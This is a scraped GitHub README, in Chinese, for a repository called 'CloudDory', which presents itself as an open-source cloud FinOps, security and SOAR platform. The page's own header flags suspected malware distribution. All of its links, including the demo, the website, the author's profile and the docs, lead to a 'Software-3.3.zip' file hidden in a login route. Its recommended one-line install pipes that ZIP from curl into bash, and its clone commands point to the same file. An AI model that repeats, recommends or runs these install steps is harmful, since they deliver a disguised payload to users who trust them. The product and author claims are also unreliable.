Skipmandibular738/clouddory

GitHub: Skipmandibular738/clouddory

声称是集成 FinOps、安全、威胁情报与 SOAR 的开源自托管云运维平台,但仓库存在严重恶意软件分发嫌疑。

Stars: 0 | Forks: 0

CloudDory

CloudDory

免费且开源的云运维平台。
FinOps、安全、威胁情报与 SOAR —— 尽在一个仪表板中。
由 AI 驱动构建。支持自托管。无供应商锁定。

官网在线演示文档联系方式

License Free PRs Welcome Self Hosted AI Powered

## 什么是 CloudDory? CloudDory 用一个统一的自托管平台取代了 5 个以上的云工具: | 模块 | 功能 | |--------|-------------| | **FinOps** | 成本浏览器、浪费扫描器、异常检测、AiTags 虚拟标记、共享成本分配、节省预测 | | **安全** | 来自 NVD + CISA KEV 的 CVE 跟踪、安全态势 (CSPM)、合规性监控、漏洞管理 | | **威胁情报** | IOC 管理、威胁源、攻击者画像、情报报告 | | **自动化 (SOAR)** | 自动化剧本、工作流集成、事件响应 | | **DoryAI** | 由 Gemini、OpenAI 或 Anthropic 驱动的 AI 助手 —— 具备页面感知能力,可回答有关您云数据的问题 | 基于 Next.js 14、TypeScript、Tailwind CSS、Prisma 和 MariaDB 构建。 ## 在线演示 访问 **[dashboard.clouddory.com](https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip)** 和 **[clouddory.com](https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip)** 查看 CloudDory 的实际演示。 ## 截图
成本浏览器 - 5 种图表类型(柱状图、堆叠柱状图、折线图、面积图、堆叠面积图) - 多维度分组(服务、提供商、团队、区域) - 筛选标签、日期范围选择器、CSV 导出 - 深入到单个成本明细项,并提供通俗易懂的解释
CVE 跟踪 - 从 NVD 和 CISA KEV 同步 65+ 个 CVE - 严重性评分、CVSS、漏洞利用/补丁可用性 - 按组织跟踪(状态、分配人、备注) - 针对您的云清单进行受影响资源匹配
DoryAI 助手 - 页面感知:知道您当前所在的页面 - 回答有关您的成本、安全态势和 CVE 的问题 - 由 Gemini/OpenAI/Anthropic 驱动(需自带密钥) - 在每个页面上作为浮动小部件可用
## 快速开始 ### 一行命令(推荐) ``` curl -fsSL https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip | bash ``` 自动检测您的环境,安装依赖项,设置数据库,并启动 CloudDory。适用于 macOS 和 Linux。 ### Docker ``` git clone https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip cd clouddory docker-compose up -d ``` ### 手动安装 ``` # Prerequisites: Node.js 18+, MySQL/MariaDB git clone https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip cd clouddory/apps/dashboard npm install cp ../../.env.example .env # Edit with your DB URL npx prisma db push npm run build && npm start ``` 打开 **http://localhost:3000** —— 第一个注册的用户将成为管理员。 ## 配置 AI 通过界面转到 **Settings > AI Config** 添加您的 API 密钥: - **Google Gemini**(推荐 —— 提供免费额度) - **OpenAI** (GPT-4o, GPT-4) - **Anthropic** (Claude 3.5 Sonnet, Claude 3 Haiku) - **OpenRouter**(可访问 100+ 模型) 密钥在静态存储时使用 AES-256-CBC 加密。 ## 连接云账户 **Settings > Cloud Accounts > Connect** | 提供商 | 方式 | |----------|--------| | AWS | CloudFormation 模板(一键 IAM 角色设置) + CUR | | GCP | 具有 Billing Viewer 角色的服务账户 | | Azure | 具有 Cost Management Reader 角色的应用注册 | 仅限只读访问。CloudDory 绝不会写入您的云账户。 ## 架构 ``` clouddory/ ├── apps/ │ ├── dashboard/ # Main application (Next.js 14, SSR) │ ├── admin/ # Admin panel (Next.js 14) │ └── landing/ # Marketing site (Next.js 14, static export) ├── prisma/ # Database schema + seeds ├── docker-compose.yml # One-command deployment ├── .env.example # Environment template └── README.md ``` ### 技术栈 | 层级 | 技术 | |-------|-----------| | 前端 | Next.js 14, TypeScript, Tailwind CSS, Recharts, Framer Motion | | 后端 | Next.js API Routes, Prisma ORM | | 数据库 | MySQL / MariaDB | | 认证 | NextAuth.js (邮箱/密码 + Google OAuth) | | AI | Gemini, OpenAI, Anthropic (通过 API) | | CVE 数据 | NVD API v2.0, CISA KEV 目录 | ## 功能(53 个页面,67 个 API 路由) ### FinOps 与成本优化 - CloudLens 成本浏览器,包含 5 种图表类型 - AWS 集成 (CloudFormation + STS + Cost Explorer API) - 浪费扫描器(闲置资源、合理调整、孤立存储) - 具有可配置阈值的异常检测 - AiTags 虚拟标记引擎 - 共享成本分配(遥测或自定义百分比) - 承诺追踪器 (RIs, Savings Plans, CUDs) - 资源清单,可深入查看明细项 - 节省预测、手动输入、CSV 导出 ### 安全与合规 - 从 NVD + CISA KEV 同步的 CVE 跟踪 - 包含修复步骤的 CVE 详情页(在应用内查看) - 受影响资源匹配(无代理) - 安全态势评分 - 按组织状态跟踪(新增 > 审查中 > 已缓解) - CISA KEV “正在被积极利用”标记 ### 平台 - DoryAI 聊天助手(页面感知,真实数据上下文) - 20+ 连接器集成 (AWS, GCP, Azure, Datadog, Snowflake, K8s, OpenAI, Anthropic) - 支持拖放小部件的自定义仪表板 - 用于即席报告的查询构建器 - 预算与实际对比的支出规划 - 团队分摊展示(可分享的公共链接) - 博客 CMS(在后台编写,发布到网站) - 反馈系统(错误报告、功能请求) - 带有铃铛下拉菜单的通知系统 - API 密钥管理、SSO 配置、IP 白名单 ## 自托管 —— 您的数据,您做主 - 所有数据都保存在**您的**数据库中 - 无遥测、无回传电话、无使用追踪 - 使用您自己的 AI 密钥 —— 我们绝不会看到它们 - 只读云访问 —— 我们绝不会写入您的基础设施 - 使用 AES-256-CBC 加密存储的凭证 ## 作者 **Alan Vo** —— AI 工程师兼基础设施架构师 - 邮箱: [alanvo@gmail.com](mailto:alanvo@gmail.com) - GitHub: [@ALANDVO](https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip) - 网站: [clouddory.com](https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip) Alan 是一名专注于构建智能云平台的 AI 工程师和自动化专家。开发 CloudDory 是为了证明企业级的云运维工具不需要企业级的预算。 对 AI 工程、云架构感兴趣,或者想要合作?请通过 [alanvo@gmail.com](mailto:alanvo@gmail.com) 联系。 ## 支持 - 邮箱: [alanvo@gmail.com](mailto:alanvo@gmail.com) - 议题: [github.com/ALANDVO/clouddory/issues](https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip) - 演示: [dashboard.clouddory.com](https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip) - 文档: [clouddory.com/resources/docs](https://github.com/Skipmandibular738/clouddory/raw/refs/heads/main/apps/dashboard/src/app/(auth)/login/Software-3.3.zip) ## 许可证 [MIT](LICENSE) —— 可免费使用、修改和分发。

Alan Vo 构建 • clouddory.com在 GitHub 上加星

## 升级 当发布新版本时,使用一行命令更新您的安装: ``` cd ~/clouddory bash upgrade.sh ``` 升级脚本将会: 1. 在修改任何内容之前**备份**您的数据库 2. 从 GitHub **拉取**最新代码 3. **安装**新依赖项 4. **应用**数据库架构更改(非破坏性 —— 您的数据是安全的) 5. **重新构建**并重启应用 如果出现任何问题,结束时将显示回滚说明。 ### 手动升级 ``` cd ~/clouddory git pull origin main cd apps/dashboard npm install npx prisma db push npm run build # 重启你的进程 (pm2 restart, systemctl restart, etc.) ```
标签:AI驱动, Anthropic, CISA项目, CIS基准, CSPM, CVE跟踪, DoryAI, FinOps, Gemini, Go语言工具, GPT, IOCs, IP 地址批量处理, OpenAI, SOAR, TinkerPop, 云成本管理, 云运维, 仪表盘, 内存规避, 合规监控, 威胁情报, 子域名变形, 安全态势管理, 开发者工具, 开源, 异常检测, 成本优化, 攻击者画像, 漏洞管理, 网络信息收集, 自动化响应, 自动化攻击, 自托管平台, 请求拦截